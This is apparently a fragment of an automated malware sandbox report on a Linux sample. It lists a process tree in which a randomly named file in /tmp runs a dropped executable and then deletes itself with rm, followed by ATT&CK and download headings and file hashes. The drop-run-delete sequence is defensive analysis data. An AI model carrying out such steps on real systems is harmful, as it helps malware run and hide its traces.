/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:986
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97